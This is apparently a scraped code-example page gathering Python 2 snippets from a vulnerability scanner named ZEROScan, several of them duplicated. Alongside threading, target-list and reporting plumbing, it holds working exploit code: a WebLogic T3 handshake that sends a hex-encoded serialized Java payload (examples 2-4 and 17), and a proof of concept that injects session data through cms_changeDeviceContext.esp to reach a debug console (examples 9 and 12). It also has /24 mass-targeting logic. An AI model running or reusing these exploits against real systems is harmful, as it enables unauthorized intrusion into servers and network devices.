Ejemplo n.º 1
0
def start():
    if kb.targets and kb.targets.qsize() > 1:
        infoMsg = "ZEROScan got a total of %d targets" % kb.targets.qsize()
        log.process(infoMsg)

    runThreads(conf.threads, expThreads)

    if not kb.results:
        return

    toNum = 0
    tmp = []
    for _ in kb.results:
        if _:
            toNum += 1
            tmp.append(list(_))

    print tabulate(tmp,["target-url", "poc-name", "status"],tablefmt="grid")
    print "success : {}".format(toNum)

    _createTargetDirs()
    _setRecordFiles()

    if conf.report:
        _setReport()
Ejemplo n.º 2
0
def t3handshake(sock, server_addr):
    sock.connect(server_addr)
    sock.send(
        '74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'
        .decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    log.process('handshake successful')
Ejemplo n.º 3
0
def buildT3RequestObject(sock,dport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format('{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1,data2,data3,data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    log.process('send request payload successful,recv length:%d'%(len(sock.recv(2048))))
Ejemplo n.º 4
0
def buildT3RequestObject(sock, dport):
    data1 = '000005c3016501ffffffffffffffff0000006a0000ea600000001900937b484a56fa4a777666f581daa4f5b90e2aebfc607499b4027973720078720178720278700000000a000000030000000000000006007070707070700000000a000000030000000000000006007006fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c657400124c6a6176612f6c616e672f537472696e673b4c000a696d706c56656e646f7271007e00034c000b696d706c56657273696f6e71007e000378707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b4c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00044c000a696d706c56656e646f7271007e00044c000b696d706c56657273696f6e71007e000478707702000078fe010000aced00057372001d7765626c6f6769632e726a766d2e436c6173735461626c65456e7472792f52658157f4f9ed0c000078707200217765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e50656572496e666f585474f39bc908f10200064900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463685b00087061636b616765737400275b4c7765626c6f6769632f636f6d6d6f6e2f696e7465726e616c2f5061636b616765496e666f3b787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e56657273696f6e496e666f972245516452463e0200035b00087061636b6167657371'
    data2 = '007e00034c000e72656c6561736556657273696f6e7400124c6a6176612f6c616e672f537472696e673b5b001276657273696f6e496e666f417342797465737400025b42787200247765626c6f6769632e636f6d6d6f6e2e696e7465726e616c2e5061636b616765496e666fe6f723e7b8ae1ec90200084900056d616a6f724900056d696e6f7249000c726f6c6c696e67506174636849000b736572766963655061636b5a000e74656d706f7261727950617463684c0009696d706c5469746c6571007e00054c000a696d706c56656e646f7271007e00054c000b696d706c56657273696f6e71007e000578707702000078fe00fffe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c000078707750210000000000000000000d3139322e3136382e312e323237001257494e2d4147444d565155423154362e656883348cd6000000070000{0}ffffffffffffffffffffffffffffffffffffffffffffffff78fe010000aced0005737200137765626c6f6769632e726a766d2e4a564d4944dc49c23ede121e2a0c0000787077200114dc42bd07'.format(
        '{:04x}'.format(dport))
    data3 = '1a7727000d3234322e323134'
    data4 = '2e312e32353461863d1d0000000078'
    for d in [data1, data2, data3, data4]:
        sock.send(d.decode('hex'))
    time.sleep(2)
    log.process('send request payload successful,recv length:%d' %
                (len(sock.recv(2048))))
Ejemplo n.º 5
0
 def default(self, line):
     """
     无法识别命令时
     :param line:
     :return:
     """
     try:
         log.process("exec: %s" % line)
         SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
         print
         print SubCmd.communicate()[0]
     except:
         log.error("Unknown command: %s" % line)
Ejemplo n.º 6
0
 def default(self, line):
     """
     无法识别命令时
     :param line:
     :return:
     """
     try:
         log.process("exec: %s" % line)
         SubCmd = subprocess.Popen(line, shell=True, stdout=subprocess.PIPE)
         print
         print SubCmd.communicate()[0]
     except:
         log.error("Unknown command: %s" % line)
Ejemplo n.º 7
0
def runThreads(numThreads,
               threadFunction,
               forwardException=True,
               startThreadMsg=True):
    threads = []
    numThreads = int(numThreads)
    kb.multiThreadMode = True
    kb.threadContinue = True
    kb.threadException = False

    try:
        if numThreads > 1:
            if startThreadMsg:
                infoMsg = "starting %d threads" % numThreads
                log.process(infoMsg)

        else:
            threadFunction()
            return

        for numThread in xrange(numThreads):
            thread = threading.Thread(target=exceptionHandledFunction,
                                      name=str(numThread),
                                      args=[threadFunction])

            setDaemon(thread)

            try:
                thread.start()
            except threadError, errMsg:
                errMsg = "error occurred while starting new thread ('%s')" % errMsg
                log.error(errMsg)
                break

            threads.append(thread)

        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)
Ejemplo n.º 8
0
def setMultipleTarget():
    #urlFile
    if not conf.urlFile:
        target_urls = []
        if conf.url:
            if conf.url.endswith('/24'):
                try:
                    socket.inet_aton(conf.url.split('/')[0])
                    base_addr = conf.url[:conf.url.rfind('.') + 1]
                    target_urls = [
                        '{}{}'.format(base_addr, i)
                        for i in xrange(1, 255 + 1)
                    ]
                except socket.error:
                    errMsg = 'only id address acceptable'
                    log.error(errMsg)
            else:
                target_urls = conf.url.split(',')

            for url in target_urls:
                if url:
                    kb.targets.put((url))
        else:
            errMsg = 'the url needs to be set'
            log.error(errMsg)
        return
    if paths.ZEROSCAN_TARGET_PATH in conf.urlFile:
        conf.urlFile = safeExpandUser(conf.urlFile)
        infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
        log.process(infoMsg)
    else:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH + '/' + conf.urlFile
        conf.urlFile = safeExpandUser(conf.urlFile)
        infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
        log.process(infoMsg)

    if not os.path.isfile(conf.urlFile):
        errMsg = "the specified file does not exist"
        raise ZEROScanFilePathException(errMsg)
    for line in getFileItems(conf.urlFile):
        kb.targets.put(line.strip())
Ejemplo n.º 9
0
def exploit(target, headers=None):
    log.process("Requesting target site:"+ target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    session = requests.Session()
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)

    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)

    return res
Ejemplo n.º 10
0
def setMultipleTarget():
    #urlFile
    if not conf.urlFile:
        target_urls = []
        if conf.url:
            if conf.url.endswith('/24'):
                try:
                    socket.inet_aton(conf.url.split('/')[0])
                    base_addr = conf.url[:conf.url.rfind('.') + 1]
                    target_urls = ['{}{}'.format(base_addr, i)
                                    for i in xrange(1, 255 + 1)]
                except socket.error:
                    errMsg = 'only id address acceptable'
                    log.error(errMsg)
            else:
                target_urls = conf.url.split(',')

            for url in target_urls:
                if url:
                    kb.targets.put((url))
        else:
            errMsg = 'the url needs to be set'
            log.error(errMsg)
        return
    if paths.ZEROSCAN_TARGET_PATH in conf.urlFile:
        conf.urlFile = safeExpandUser(conf.urlFile)
        infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
        log.process(infoMsg)
    else:
        conf.urlFile = paths.ZEROSCAN_TARGET_PATH +'/'+ conf.urlFile
        conf.urlFile = safeExpandUser(conf.urlFile)
        infoMsg = "parsing multiple targets list from '%s'" % conf.urlFile
        log.process(infoMsg)

    if not os.path.isfile(conf.urlFile):
        errMsg = "the specified file does not exist"
        raise ZEROScanFilePathException(errMsg)
    for line in getFileItems(conf.urlFile):
        kb.targets.put(line.strip())
Ejemplo n.º 11
0
def expThreads():
    """
    @function multiThread executing
    """
    zsp = PluginBase(package='zsplugins')
    plugin_zsp = zsp.make_plugin_source(searchpath=[paths.ZEROSCAN_PLUGINS_PATH])
    zspi = plugin_zsp.load_plugin('%s'%(kb.CurrentPlugin))

    while not kb.targets.empty() and kb.threadContinue:
        target = kb.targets.get()
        infoMsg = "exploit target:'%s'" % (target)
        log.process(infoMsg)
        # TODO
        result = zspi.exploit(target, headers=conf.httpHeaders)
        #插件中没有返回值就默认是失败
        if not result:
            continue
        output = (target, kb.CurrentPlugin, result)

        kb.results.add(output)
        if isinstance(conf.timeout, (int, float)) and conf.timeout > 0:
            time.sleep(conf.timeout)
Ejemplo n.º 12
0
def exploit(target, headers=None):
    log.process("Requesting target site:" + target)
    create_session_url = '{}/esp/cms_changeDeviceContext.esp?device=aaaaa:a%27";user|s."1337";'.format(
        target)
    verify_url = '{}/php/utils/debug.php'.format(target)

    session = requests.Session()
    if 'https' in target:
        session.get(verify_url, verify=False)
        session.get(create_session_url, verify=False)
        verify = session.get(verify_url, verify=False)
    else:
        session.get(verify_url)
        session.get(create_session_url)
        verify = session.get(verify_url)

    if 'Debug Console' in verify.text:
        res = '{} is vul'.format(target)
    else:
        res = '{} is not vul'.format(target)

    return res
Ejemplo n.º 13
0
def runThreads(numThreads, threadFunction, forwardException=True, startThreadMsg=True):
    threads = []
    numThreads = int(numThreads)
    kb.multiThreadMode = True
    kb.threadContinue = True
    kb.threadException = False

    try:
        if numThreads > 1:
            if startThreadMsg:
                infoMsg = "starting %d threads" % numThreads
                log.process(infoMsg)

        else:
            threadFunction()
            return

        for numThread in xrange(numThreads):
            thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction])

            setDaemon(thread)

            try:
                thread.start()
            except threadError, errMsg:
                errMsg = "error occurred while starting new thread ('%s')" % errMsg
                log.error(errMsg)
                break

            threads.append(thread)

        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)
Ejemplo n.º 14
0
        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)

    except KeyboardInterrupt:
        print
        kb.threadContinue = False
        kb.threadException = True

        if numThreads > 1:
            log.process("waiting for threads to finish (Ctrl+C was pressed)")
        try:
            while (threading.activeCount() > 1):
                pass

        except KeyboardInterrupt:
            raise ZEROScanThreadException("user aborted (Ctrl+C was pressed multiple times)")

        if forwardException:
            raise

    except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
        print
        kb.threadException = True
        log.process("thread %s: %s" % (threading.currentThread().getName(), errMsg))
Ejemplo n.º 15
0
def exploit(target, headers=None):
    log.process("Requesting target site:" + target)
    return yourDefinition()
Ejemplo n.º 16
0
        # And wait for them to all finish
        alive = True
        while alive:
            alive = False
            for thread in threads:
                if thread.isAlive():
                    alive = True
                    time.sleep(0.1)

    except KeyboardInterrupt:
        print
        kb.threadContinue = False
        kb.threadException = True

        if numThreads > 1:
            log.process("waiting for threads to finish (Ctrl+C was pressed)")
        try:
            while (threading.activeCount() > 1):
                pass

        except KeyboardInterrupt:
            raise ZEROScanThreadException(
                "user aborted (Ctrl+C was pressed multiple times)")

        if forwardException:
            raise

    except (ZEROScanConnectionException, ZEROScanValueException), errMsg:
        print
        kb.threadException = True
        log.process("thread %s: %s" %
Ejemplo n.º 17
0
def t3handshake(sock,server_addr):
    sock.connect(server_addr)
    sock.send('74332031322e322e310a41533a3235350a484c3a31390a4d533a31303030303030300a0a'.decode('hex'))
    time.sleep(1)
    sock.recv(1024)
    log.process('handshake successful')